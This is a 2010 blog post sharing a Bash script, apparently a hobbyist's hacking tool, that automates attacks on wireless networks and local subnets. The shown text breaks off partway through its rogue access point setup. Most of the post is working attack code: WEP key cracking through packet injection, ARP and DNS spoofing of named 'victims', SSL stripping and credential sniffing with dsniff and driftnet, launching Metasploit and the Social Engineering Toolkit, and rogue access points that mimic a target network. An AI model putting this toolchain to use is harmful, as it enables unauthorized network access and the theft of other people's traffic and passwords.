Tuesday, November 9, 2010

...:::sLiPpErY's H4X0R tOoL:::...






This is a work in Progress....


NEED A HINT.... http://vimeo.com/13245482 Just the beginning...

Last Update 11-9-10 Check back for updates...

Currently you can..

1. Create a Rogue AP and either sniff or attack it ... ...NEW after you crack wep you can mirror the wep encrypted AP.. endless possibilities... not tested.. only theory at this point...

2. Sniff or Attack your local subnet

3. Crack WEP (there are a lot of WEP attacks but I don't believe I have them all complete, so feel free to help with them, I have the basic layout done though) :)

4. Update some of the tools used in this script.


I notice the code is kind of screwed up on here. Not sure what to do about that.... If you know, comment :)

Comment on what you would like to see added to this, or any bugs you find.

If you need a tutorial on how to use this, please ask and I shall create!

TODO: ALOT... haha...


#!/bin/bash
clear
echo "******************************************************************";
echo "*            WeLcOmE tO sLiPpErY's H4X0R tOoL rEv 0.1            *";
echo "*  TeStEd WiTh BackTrack 4 R1 aNd rOgUe Ap TeStEd WiTh rt73usb!  *";
echo "*            FeEl FrEe To EdIt ThIs FiLe As ToU wIsH!            *";
echo "* SeNd QuEsTiOnS, cOmMeNtS oR aDdItIoNs To slippery@shellium.org *";
echo "******************************************************************";
echo

# WEP Crack setup
function wepcrack(){
clear;
echo "******************************************************************";
echo "*********************Time to H4X0R some WEP!!*********************";
echo "******************************************************************";
echo "Checking if the correct programs are installed..........";
type -P aircrack-ng &>/dev/null || { echo "I require aircrack-ng but it's not installed.  Abort.";}
type -P xterm &>/dev/null || { echo "I require xterm but it's not installed.  Abort.";}
type -P macchanger &>/dev/null || { echo "I require macchanger to spoof your mac address but it's not installed.";}
echo "******************************************************************";
echo "Killing old processes if they exist";
airmon-ng stop mon0 &>/dev/null; # Just incase you were already using monitor mode
airmon-ng stop mon1 &>/dev/null; # If you happen to of had a 4th interface or
airmon-ng stop mon2 &>/dev/null; # if your interface isn't mon0-3 please edit
airmon-ng stop mon3 &>/dev/null; # this to what you have, ONLY EDIT HERE!!
killall -q aircrack-ng airodump-ng aireplay-ng xterm &>/dev/null; # Should kill all programs that may interfere with this script
echo "******************************************************************";
echo "Enter the interface used to H4X0R with (Ex. wlan0, wlan1)";
read WIFACE;
echo "Using "$WIFACE" to H4X0R with";
ifconfig "$WIFACE" up;
echo "******************************************************************";
airmon-ng start "$WIFACE" &>/dev/null;
MIFACE=`ifconfig | grep UNSPEC | awk '{ print $1}' | cut -c 1-4`; # Finds your monitor interface from the selected interface - Note: If you see mutiple monitor interfaces then you need to edit above where it talks about killing monitor interfaces and insert the monitor interface you use.
echo "Using "$MIFACE" as your monitor interface";
echo "******************************************************************";
xterm -hold -bg black -fg blue -T "Scanning networks" -geometry 90x20 -e airodump-ng "$MIFACE" -t wep &>/dev/null & # Scans for local WiFi networks
echo "You should see a new window with local WEP networks";
echo "******************************************************************";
echo "Enter the name of an AP to H4X0R";
read ESSID;
echo "******************************************************************";
echo "Enter the channel "$ESSID" is using";
read CHAN;
echo "******************************************************************";
echo "Enter the MAC of "$ESSID"";
read BSSID;
echo "******************************************************************";
echo "If there is a client connected to "$ESSID" please type their MAC or just press enter";
read CLIENTMAC;
echo "******************************************************************";
echo ""$ESSID"'s MAC is "$BSSID" and is using channel "$CHAN"";
echo "******************************************************************";
echo "Enter the MAC you want to use for "$MIFACE" (Ex: 0A:1B:2C:3D:4E:5F)";
read MAC;
echo "******************************************************************";
echo "Restarting "$WIFACE" and changing the MAC address to "$MAC" on "$MIFACE"";
echo
airmon-ng stop "$MIFACE" &>/dev/null;
airmon-ng stop "$WIFACE" &>/dev/null;
ifconfig "$WIFACE" down;
ifconfig "$WIFACE" up;
airmon-ng start "$WIFACE" "$CHAN" &>/dev/null;
ifconfig "$MIFACE" down;
sleep 2;
macchanger -m "$MAC" "$MIFACE";
sleep 1;
ifconfig "$MIFACE" up;
modprobe tun;
sleep 1;
killall -q airodump-ng xterm &>/dev/null;
sleep 1;
echo "******************************************************************";
echo "Testing "$MIFACE" for injection";
xterm -hold -bg black -fg blue -T "Injection Test" -geometry 90x20 -e aireplay-ng -9 -e "$ESSID" -b "$BSSID" "$MIFACE" &>/dev/null &
sleep 5;
killall -q aireplay-ng xterm &>/dev/null;
sleep 2;
clear;
wepattackmenu;
}

#Captures IV's and saves them to h4x0r.cap
function capture(){
echo "******************************************************************";
rm h4x0r.cap-*;
sleep 2;
echo "Starting to capture IV's from "$ESSID"";
xterm -hold -bg black -fg blue -T "Capturing IV's" -geometry 90x20 -e airodump-ng -c $CHAN --bssid "$BSSID" -w h4x0r.cap "$MIFACE" &>/dev/null &
sleep 5;
}

function associate(){
echo "******************************************************************";
echo "Trying to associate with "$ESSID"";
xterm -hold -bg black -fg blue -T "Associating" -geometry 90x20 -e aireplay-ng -1 0 -e "$ESSID" -a "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null &
#For Picky AP's uncomment below and comment the above...
#xterm -hold -bg black -fg blue -T "Associating" -geometry 90x20 -e aireplay-ng -1 30 -q 10 -o 1 -e "$ESSID" -a "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function injectarpclientless(){
echo "******************************************************************";
echo "Injecting ARP packets into "$ESSID"";
xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -3 -b "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function injectarpclient(){
echo "******************************************************************";
echo "Injecting Client ARP packets into "$ESSID"";
#xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -2 -b "$BSSID" -d FF:FF:FF:FF:FF:FF -m 68 -n 86 -t 1 -f 1 "$MIFACE" &>/dev/null &
xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -3 -b "$BSSID" -h "$CLIENTMAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function randomarpclientless(){
echo "******************************************************************";
echo "Injecting a random ARP packet into "$ESSID"";
xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b "$BSSID" -h "$MAC" -r replay*.cap "$MIFACE" &>/dev/null &
xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -m 68 -n 86 -b "$BSSID" -c FF:FF:FF:FF:FF:FF -h "$MAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function randomarpclient(){
echo "******************************************************************";
echo "Injecting a random ARP packet into "$ESSID"";
xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b "$BSSID" -h "$CLIENTMAC" -r replay*.cap "$MIFACE" &>/dev/null &
xterm -hold -bg black -fg blue -T "Reinjecting random ARP packet" -geometry 90x20 -e aireplay-ng -2 -p 0841 -m 68 -n 86 -b "$BSSID" -c FF:FF:FF:FF:FF:FF -h "$CLIENTMAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function fragclientless(){
echo "******************************************************************";
echo "Starting fragmenation attack against "$ESSID"";
xterm -hold -bg black -fg blue -T "Fragmenation Attack" -geometry 90x20 -e aireplay-ng -5 -b "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function fragclient(){
echo "******************************************************************";
echo "Starting fragmenation attack against "$ESSID"";
xterm -hold -bg black -fg blue -T "Fragmenation Attack" -geometry 90x20 -e aireplay-ng -5 -b "$BSSID" -h "$CLIENTMAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function chopchopclientless(){
echo "******************************************************************";
echo "Starting chop chop attack against "$ESSID"";
xterm -hold -bg black -fg blue -T "Chop Chop Attack" -geometry 90x20 -e aireplay-ng -4 -b "$BSSID" -h "$MAC" "$MIFACE" &>/dev/null &
sleep 5;
}

function chopchopclient(){
echo "******************************************************************";
echo "Starting chop chop attack against "$ESSID"";
xterm -hold -bg black -fg blue -T "Chop Chop Attack" -geometry 90x20 -e aireplay-ng -4 -b "$BSSID" -h "$CLIENTMAC" "$MIFACE" &>/dev/null &
sleep 5;
}


function injectcapturedarpcleintless(){
echo "******************************************************************";
echo "Injecting the created ARP packet";
xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -2 -b "$BSSID" -h "$MAC" -r h4x0r-arp "$MIFACE" &>/dev/null &
sleep 5;
}

function injectcapturedarpcleint(){
echo "******************************************************************";
echo "Injecting the created ARP packet";
xterm -hold -bg black -fg blue -T "Injecting ARP packets" -geometry 90x20 -e aireplay-ng -2 -b "$BSSID" -h "$CLIENTMAC" -r h4x0r-arp "$MIFACE" &>/dev/null &
sleep 5;
}

function xorfragclientless(){
packetforge-ng -0 -a "$BSSID" -h "$MAC" -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w h4x0r-arp
sleep 5;
}

function xorfragclient(){
packetforge-ng -0 -a "$BSSID" -h "$CLIENTMAC" -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w h4x0r-arp
sleep 5;
}

function xorchopchopclientless(){
packetforge-ng -0 -a "$BSSID" -h "$MAC" -k 255.255.255.255 -l 255.255.255.255 -y replay*.xor -w h4x0r-arp
sleep 5;
}

function xorchopchopclient(){
packetforge-ng -0 -a "$BSSID" -h "$CLIENTMAC" -k 255.255.255.255 -l 255.255.255.255 -y replay*.xor -w h4x0r-arp
sleep 5;
}

#Cracks the key....
function crackkey(){
echo "******************************************************************";
read -p "Hit Enter when you have 10,000 IV's, could take up to 5 min.";
echo "******************************************************************";
echo "Starting to H4X0R the WEP key..................";
xterm -hold -bg black -fg blue -T "Cracking" -e aircrack-ng -b "$BSSID" h4x0r*.cap &>/dev/null &
sleep 1;
echo "******************************************************************";
echo "You should see the WEP key soon......";
echo "******************************************************************";
exit 0
}

#Defines the type of attack to crack WEP
function wepattackmenu(){
clear;
echo "******************************************************************";
echo "**************Please select the type of attack below**************";
echo "THIS WILL DELETE ANY PREVIOUS h4x0r.cap* FILE RENAME IT TO KEEP IT";
echo "******************************************************************";
showMenu () {
 echo
 echo "1) ARP request replay attack (clientless)"
 echo "2) NOT TESTED Fragmentation (clientless)"
 echo "3) NOT TESTED Chop Chop (clientless)"
 echo "3) NOT TESTED ARP request replay attack (client)"
 echo "4) NOT TESTED Fragmentation (Client)"
 echo "5) NOT TESTED Chop Chop (client)"
}
while [ 1 ]
do
 showMenu
 read CHOICE
 case "$CHOICE" in
 "1")
  echo "ARP request replay attack (clientless)";
  capture;
  associate;
  injectarpclientless;
  crackkey;
  ;;
 "2")
  echo "Fragmentation (clientless)";
  capture;
  associate;
  fragclientless;
  xorfragclientless;
  injectcapturedarpcleintless;
  crackkey;
  ;;
 "3")
  echo "Chop Chop (clientless)"
  capture;
  associate;
  chopchopclientless;
  xorchopchopclientless;
  injectcapturedarpcleintless;
  crackkey;
  ;;
 "4")
  echo "ARP request replay attack (client)";
  capture;
  associate;
  injectarpclientless;
  injectarpclient;
  crackkey; 
  ;;
 "5")
  echo "Fragmentation (Client)";
  capture;
  fragclient;
  xorfragclient;
  injectcapturedarpcleint;
  crackkey;
  ;;
 "6")
  echo "Chop Chop (client)";
  capture;
  chopchopclient;
  xorchopchopclient;
  injectcapturedarpcleintless;
  crackkey;
  ;;
 esac
done
}

# Script to gain information about your subnet and H4X0R it!
function subnetscript(){
clear;
echo "******************************************************************";
echo "Checking if the correct programs are installed..........";
type -P xterm &>/dev/null || { echo "I require xterm but it's not installed.  Abort.";}
type -P iptables &>/dev/null || { echo "I require iptables but it's not installed.  Abort.";}
type -P ettercap &>/dev/null || { echo "I require ettercap but it's not installed.";}
type -P arpspoof &>/dev/null || { echo "I require arpspoof but it's not installed.";}
type -P sslstrip &>/dev/null || { echo "I require sslstrip for a sniffing tool but it's not installed.";}
type -P driftnet &>/dev/null || { echo "I require driftnet for a sniffing tool but it's not installed.";}
type -P urlsnarf &>/dev/null || { echo "I require urlsnarf for a sniffing tool but it's not installed.";}
type -P dsniff &>/dev/null || { echo "I require dsniff for a sniffing tool but it's not installed.";}
type -P python &>/dev/null || { echo "I require python for certain tools but it's not installed.";}
type -P macchanger &>/dev/null || { echo "I require macchanger to spoof your mac address but it's not installed.";}
type -P msfconsole &>/dev/null || { echo "I require metasploit for an attack tool but it's not installed.";}
locate set_config &>/dev/null || { echo "I require Social Engineering Toolkit for an attack tool but it's not installed.";}
locate fast-track.py &>/dev/null || { echo "I require fast-track.py for an attack tool but it's not installed.";}
locate SimpleHTTPServer &>/dev/null || { echo "I require SimpleHTTPServer for an attack tool but it's not installed.";}
echo "******************************************************************";
echo "Activating IP Forwarding and killing old H4X0R processes if they exist";
echo "******************************************************************";
echo "Note: I'm not killing certian tools as you may have them open and waiting before you run this script";
killall -q ettercap arpspoof sslstrip driftnet urlsnarf dsniff xterm tail &>/dev/null & # Should kill all programs that may interfere with this script
iptables --flush; # Makes sure your iptables are clear
iptables --table nat --flush; # Makes sure your iptables are clear
iptables --delete-chain; # Makes sure your iptables are clear
iptables --table nat --delete-chain; # Makes sure your iptables are clear
echo 1 > /proc/sys/net/ipv4/ip_forward; # Sets IP forwarding
echo "******************************************************************";
IFACE=`ip route  | awk '{print $3}' | sed q`; # Finds your interface
echo "Using "$IFACE" as your internet connected interface";
echo "******************************************************************";
IFACEIP=`ip route | grep src | awk '{print $9}'`; # Finds your IP
echo "Using "$IFACEIP" as your IP address for "$IFACE"";
echo "******************************************************************";
GW=`ip route | grep via | awk '{print $3}'`; # Finds your Gateway IP
echo "Using "$GW" for the Gateway address for "$IFACE"";
echo "******************************************************************";
SUBNET=`ip route | awk '{print $1}' | sed q` # Finds your subnet
echo "Using "$SUBNET" as as the subet to H4X0R";
echo "******************************************************************";
echo "Enter a MAC address to use, Ex: 0A:1B:2C:3D:4E:5F or hit enter to leave your MAC alone";
read MAC;
echo "using "$MAC" for your MAC address";
echo "******************************************************************";
echo "Restarting and changing the MAC address to "$MAC" on "$IFACE"";
ifconfig "$IFACE" down;
sleep 2;
macchanger -m "$MAC" "$IFACE";
ifconfig "$IFACE" up;
modprobe tun;
echo "******************************************************************";
arpsetup;
qsubnet;
}

# Arpspoof Setup for subnet
function arpsetup(){
clear;
echo "******************************************************************";
echo "Do you want to arpspoof one client or all clients on the subnet of "$SUBNET"? (one or all) Note: webspy only works with one client!";
read SNIFFING;
echo "******************************************************************";
if [ "$SNIFFING" == "all" ];then
  arpspoof -i "$IFACE" "$GW" &>/dev/null &
elif [ "$SNIFFING" == "one" ];then
  xterm -hold -bg black -fg blue -T "netdiscover" -e netdiscover -i "$IFACE" -r "$SUBNET" &>/dev/null &
  echo "******************************************************************";
  echo "Enter the victim's IP from the 'netdiscover' window";
  read CLIENT;
  echo "arpspoofing "$CLIENT" only";
  echo "******************************************************************";
  arpspoof -i "$IFACE" -t "$GW" "$CLIENT" &>/dev/null &
  arpspoof -i "$IFACE" -t "$CLIENT" "$GW" &>/dev/null &
else 
  echo "******************************************************************";
  echo "Enter 'one' or 'all' only!!!";
  exit 0
fi
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080;
}

# DNS Spoof setup for subnet
function dnsspoof(){
clear;
iptables --table nat --flush; # clears the way for attacks...
echo "******************************************************************";
echo "You can run this over and over if you need to change DNS spoofing";
echo "******************************************************************";
  if cat /etc/etter.conf | grep -q '#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"'; then
    sed -i 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf;
    sed -i 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf;
    echo "Uncommented your iptables in /etc/etter.conf for you :)";
  fi
killall -q ettercap &>/dev/null &
echo "Enter a website you want to dns spoof (Ex. '*.google.com' or '*' for all sites)";
read DNSADDY;
echo "Every time a victim tries to connect to "$DNSADDY" they will be forwarded to "$IFACEIP"";
echo "******************************************************************";
echo ""$DNSADDY" A "$IFACEIP"" > /usr/share/ettercap/etter.dns
xterm -hold -bg black -fg blue -T "ettercap" -e sudo ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i "$IFACE" -P dns_spoof /"$CLIENT"/ /"$GW"/ &>/dev/null &
#sudo ettercap -G &>/dev/null &
sleep 5;
}

# Attack Menu for subnet
function attacksn(){
clear;
echo "******************************************************************";
echo "Launch DNS Spoof after your tools are setup!";
echo "******************************************************************";
  showMenu () {
 echo
 echo "1) SimpleHTTPServer port 80"
 echo "2) Social Engineering Toolkit"
 echo "3) Metasploit"
 echo "4) Fast-Track"
 echo "5) Add your own tool"
 echo "6) Launch DNS Spoof"
 echo "7) Exit and cleanup"
 echo "8) Exit and leave everything running"
 echo 
}
while [ 1 ]
do
 showMenu
 read CHOICE
 case "$CHOICE" in
 "1")
   echo "Setting up SimpleHTTPServer on port 80 in "$PWD"";
   xterm -bg black -fg blue -T "SimpleHTTPServer" -e python -m SimpleHTTPServer 80 &>/dev/null &
  ;;
 "2")
   echo "Setting up Social Engineering Toolkit";
   cd /pentest/exploits/SET && xterm -bg black -fg blue -T "Social Engineering Toolkit" -e ./set &>/dev/null &
  ;;
 "3")
   echo "Setting up Metasploit.........";
   cd /pentest/exploits/framework3 && xterm -bg black -fg blue -T "Metasploit" -e ./msfconsole &>/dev/null &
   sleep 2;
   echo "Few more seconds......";
  ;;
 "4")
   echo "Setting up Fast-Track";
   cd /pentest/exploits/fasttrack/ && xterm -bg black -fg blue -T "Fast-Track" -e ./fast-track.py -i &>/dev/null & 
  ;;
 "5")
   echo "******************************************************************";
   echo "What other attacks are you planning? Email me slippery@shellium.org";
  xterm -bg black -fg blue &>/dev/null &
   echo "******************************************************************";
  ;;
 "6")
   dnsspoof;
  ;;

 "7")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   cleanup;
   exit 0
  ;;
 "8")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
   exit 0
  ;;
 esac
done
}

# Sniff menu for subnet
function sniffsn(){
clear;
echo "******************************************************************";
echo "Checking to see if your ready to run ettercap...";
echo "******************************************************************";
  if cat /etc/etter.conf | grep -q '#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"'; then
    sed -i 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf;
    sed -i 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf;
    echo "Uncommented your iptables in /etc/etter.conf for you :)";
  fi
killall -q ettercap &>/dev/null &
xterm -hold -bg black -fg blue -T "ettercap" -e sudo ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i "$IFACE" /"$CLIENT"/ /"$GW"/ &>/dev/null &
#sudo ettercap -G &>/dev/null &
sleep 7;
clear;
echo "If ettercap is now sniffing then startup some other fun tools";
echo "******************************************************************";
  showMenu () {
 echo
 echo "1) sslstrip"
 echo "2) driftnet"
 echo "3) urlsnarf"
 echo "4) dsniff"
 echo "5) webspy (Only if you slected one client)"
 echo "6) Add your own tool"
 echo "7) Stop sniffing and start attacking"
 echo "8) Exit and cleanup"
 echo "9) Exit and leave everything running"
 echo
}
while [ 1 ]
do
 showMenu
 read CHOICE
 case "$CHOICE" in
 "1")
   echo "Setting up sslstrip";
   xterm -bg black -fg blue -T "sslstrip" -e sslstrip -a -k -f -l 8080 &>/dev/null &
   sleep 1;
   xterm -bg black -fg blue -T "sslstrip log" -e tail -f sslstrip.log &>/dev/null &
   ;;
 "2")
   echo "Setting up driftnet";
   xterm -bg black -fg blue -T "driftnet" -e driftnet -v -i "$IFACE" &>/dev/null & 
   ;;
 "3")
   echo "Setting up urlsnarf";
   xterm -bg black -fg blue -T "urlsnarf" -e urlsnarf -i "$IFACE" &>/dev/null & 
   ;;
 "4")
   echo "Setting up dsniff";
   xterm -bg black -fg blue -T "dsniff" -e dsniff -m -i "$IFACE" -d -s 4096 -w dsniff$(date +%F-%H%M).log &>/dev/null &  
   ;;
 "5")
   echo "Setting up webspy";
   xterm -bg black -fg blue -T "webspy" -e webspy -i "$IFACE" "$CLIENT" &>/dev/null &
   sleep 2;
   mozilla &
   ;;
 "6")
   echo "******************************************************************";
   echo "What other sniffing tools are you planning to use? Email me slippery@shellium.org";
   xterm -bg black -fg blue &>/dev/null &
   echo "******************************************************************";
   ;;
 "7")
   attackmenu;
   ;;
 "8")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   cleanup;
   exit 0
   ;;
 "9")
   echo "******************************************************************";
   echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
   echo "******************************************************************";
   firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
   exit 0
   ;;
 esac
done
}

# Defines if you want to sniff or attack the subnet
function qsubnet(){
clear;
echo "Do you want to sniff or attack the subnet of "$SUBNET"? (sniff or attack)";
read SN;
if [ "$SN" == "sniff" ];then
  sniffsn;
elif [ "$SN" == "attack" ];then
  attacksn;
else 
  echo "******************************************************************";
  echo "Enter 'sniff' or 'attack' only!!!";
  exit 0
fi
}

# Script to gain information to create a Rogue AP!
function rogueapscript(){
clear;
echo "******************************************************************";
echo "!!! Make sure the interface used to create the Rogue AP is connected before running this script, and that you are connected to the internet with a different interface !!!";
echo
echo "Checking if the correct programs are installed..........";
type -P dhcpd3 &>/dev/null || { echo "I require dhcpd3 but it's not installed.  Abort.";}
type -P aircrack-ng &>/dev/null || { echo "I require aircrack-ng but it's not installed.  Abort.";}
type -P xterm &>/dev/null || { echo "I require xterm but it's not installed.  Abort.";}
type -P iptables &>/dev/null || { echo "I require iptables but it's not installed.  Abort.";}
type -P ettercap &>/dev/null || { echo "I require ettercap for sniffing but it's not installed.";}
type -P sslstrip &>/dev/null || { echo "I require sslstrip for a sniffing tool but it's not installed.";}
type -P driftnet &>/dev/null || { echo "I require driftnet for a sniffing tool but it's not installed.";}
type -P urlsnarf &>/dev/null || { echo "I require urlsnarf for a sniffing tool but it's not installed.";}
type -P dsniff &>/dev/null || { echo "I require dsniff for a sniffing tool but it's not installed.";}
type -P python &>/dev/null || { echo "I require python for certain tools but it's not installed.";}
type -P macchanger &>/dev/null || { echo "I require macchanger to spoof your mac address but it's not installed.";}
type -P msfconsole &>/dev/null || { echo "I require metasploit for an attack tool but it's not installed.";}
locate set_config &>/dev/null || { echo "I require Social Engineering Toolkit for an attack tool but it's not installed.";}
locate fast-track.py &>/dev/null || { echo "I require fast-track.py for an attack tool but it's not installed.";}
locate SimpleHTTPServer &>/dev/null || { echo "I require SimpleHTTPServer for an attack tool but it's not installed.";}
echo "******************************************************************";
echo "Activating IP Forwarding and killing old Rogue AP processes if they exist";
echo "******************************************************************";
echo "Note: I'm not killing certian tools as you may have them open and waiting before you run this script";
airmon-ng stop mon0 &>/dev/null; # Just incase you were already using monitor mode
airmon-ng stop mon1 &>/dev/null; # If you happen to of had a 4th interface or
airmon-ng stop mon2 &>/dev/null; # if your interface isn't mon0-3 please edit
airmon-ng stop mon3 &>/dev/null; # this to what you have, ONLY EDIT HERE!!
killall -q dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf dsniff xterm tail &>/dev/null & # Should kill all programs that may interfere with this script
iptables --flush; # Makes sure your iptables are clear
iptables --table nat --flush; # Makes sure your iptables are clear
iptables --delete-chain; # Makes sure your iptables are clear
iptables --table nat --delete-chain; # Makes sure your iptables are clear
echo 1 > /proc/sys/net/ipv4/ip_forward; # Sets IP forwarding
echo "******************************************************************";
IFACE=`ip route  | awk '{print $3}' | sed q`; # Finds your interface
echo "Using "$IFACE" as your internet connected interface";
echo "******************************************************************";
IFACEIP=`ip route | grep src | awk '{print $9}'`; # Finds your IP
echo "Using "$IFACEIP" as your IP address for "$IFACE"";
echo "******************************************************************";
GW=`ip route | grep via | awk '{print $3}'`; # Finds your Gateway IP
echo "Using "$GW" for the Gateway address for "$IFACE"";
echo "******************************************************************";
echo "Enter the Interface used to create the Rogue AP (Ex. wlan0, wlan1)";
read WIFACE;
echo "Using "$WIFACE" to create the Rouge AP";
ifconfig "$WIFACE" up;
echo "******************************************************************";
airmon-ng start "$WIFACE" &>/dev/null;
MIFACE=`ifconfig | grep UNSPEC | awk '{ print $1}' | cut -c 1-4`; # Finds your monitor interface from the selected Rogue AP interface - Note: If you see mutiple monitor interfaces then you need to edit above where it talks about killing monitor interfaces and insert the monitor interface you use.
echo "Using "$MIFACE" as your monitor interface";
echo "******************************************************************";
iwlist "$WIFACE" scan | grep -E 'Address:|Channel:|ESSID:'; # Scans for local WiFi networks
echo
echo "^^^Above are some local WiFi networks^^^";
echo "******************************************************************";
echo "Enter the name of your Rogue AP";
read AP;
echo "Using "$AP" for Rogue AP name";
echo "******************************************************************";
echo "Enter the channel number for your Rogue AP (1,2,3,4,5,6,7,8,9)";
read CH;
echo "Using "$CH" for Rogue AP channel";
echo "******************************************************************";
echo "Enter the MAC for your Rogue AP (Ex: 0A:1B:2C:3D:4E:5F)";
read MAC;
echo "Using "$MAC" for Rogue AP MAC address";
echo "******************************************************************";
echo "Select your MTU setting (1400, 1500 or maybe 1800??)";
read MTU;
echo "Using "$MTU", If you have problems try a different setting";
echo "******************************************************************";
echo "Restarting "$WIFACE" and changing the MAC address to "$MAC" on "$MIFACE"";
airmon-ng stop "$MIFACE" &>/dev/null;
airmon-ng stop "$WIFACE" &>/dev/null;
ifconfig "$WIFACE" down;
ifconfig "$WIFACE" up;
airmon-ng start "$WIFACE" &>/dev/null;
ifconfig "$MIFACE" down;
sleep 2;
macchanger -m "$MAC" "$MIFACE";
ifconfig "$MIFACE" up;
modprobe tun;
echo "******************************************************************";
echo "Testing "$MIFACE" for injection";
xterm -hold -bg black -fg blue -T "Injection Test" -e aireplay-ng --test "$MIFACE" &>/dev/null &
sleep 7;
killall -q aireplay-ng;
echo "******************************************************************";
qrogueap;
}

#Sends you to the correct function if your copying someone's AP
function mirror(){
echo "Are you mirroring "$AP", and do they have WEP encryption? (yes or no)";
read WEP;
if [ "$WEP" == "yes" ];then
  echo "Enter their WEP key now";
  read WEPKEY;
  echo "Using "$WEPKEY" for "$AP"'s WEP key";
  weprogueap;
elif [ "$WEP" == "no" ];then
  rogueap;
else
  echo "******************************************************************";
  echo "Enter 'yes' or 'no' only!!!";
  exit 0
fi
}

#Creates the Rogue AP
function rogueap(){
clear;
echo "Do you want to let users connect, or help users to connect to "$AP"? (let or help)";
read CON;
if [ "$CON" == "let" ];then
  echo "******************************************************************";
  echo "Building your "$AP" Rogue AP...."; 
  xterm -hold -bg black -fg blue -T "$AP" -e airbase-ng -e "$AP" -c "$CH" -v "$MIFACE" &>/dev/null &
  echo "******************************************************************";
  echo "Letting the clients connect to "$AP"";
elif [ "$CON" == "help" ];then
  echo "******************************************************************";
  echo "Building your "$AP" Rogue AP....";
  xterm -hold -bg black -fg blue -T "$AP" -e airbase-ng -P -C 30 -e "$AP" -c "$CH" -v "$MIFACE" &>/dev/null &
  echo "******************************************************************";
  echo "Helping clients to connect to "$AP"";
else 
  echo "******************************************************************";
  echo "Enter 'let' or 'help' only!!!";
  exit 0
fi
echo "******************************************************************";
echo "Waiting a few seconds for "$AP" to be established";
sleep 5;
apsetup;
}

#Creates the Rogue AP with WEP encryption
function weprogueap(){
clear;
echo "Do you want to let users connect, or help users to connect to "$AP"? (let or help)";
read CON;
if [ "$CON" == "let" ];then
  echo "******************************************************************";
  echo "Building your "$AP" Rogue AP...."; 
  xterm -hold -bg black -fg blue -T "$AP" -e airbase-ng -e "$AP" -c "$CH" -w "$WEPKEY" -v "$MIFACE" &>/dev/null &
  echo "******************************************************************";
  echo "Letting the clients connect to "$AP"";
elif [ "$CON" == "help" ];then
  echo "******************************************************************";
  echo "Building your "$AP" Rogue AP....";
  xterm -hold -bg black -fg blue -T "$AP" -e airbase-ng -P -C 30 -e "$AP" -c "$CH" -w "$WEPKEY" -v "$MIFACE" &>/dev/null &
  echo "******************************************************************";
  echo "Helping clients to connect to "$AP"";
else 
  echo "******************************************************************";
  echo "Enter 'let' or 'help' only!!!";
  exit 0
fi
echo "******************************************************************";
echo "Waiting a few seconds for "$AP" to be established";
sleep 5;
apsetup;
}

# Sets up your Rogues AP's iptables and dhcp server
function apsetup(){
ifconfig at0 up;
ifconfig at0 mtu "$MTU";
ifconfig at0 10.0.0.1 netmask 255.255.255.0;
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1;
echo "******************************************************************";
echo ""$AP" should be running now!";
echo "******************************************************************";
echo "Setting up the iptables";
iptables -P FORWARD ACCEPT;
iptables --table nat --append POSTROUTING --out-interface "$IFACE" -j MASQUERADE;
iptables --append FORWARD --in-interface at0 -j ACCEPT;
if [ "$DO" == "sniff" ];then
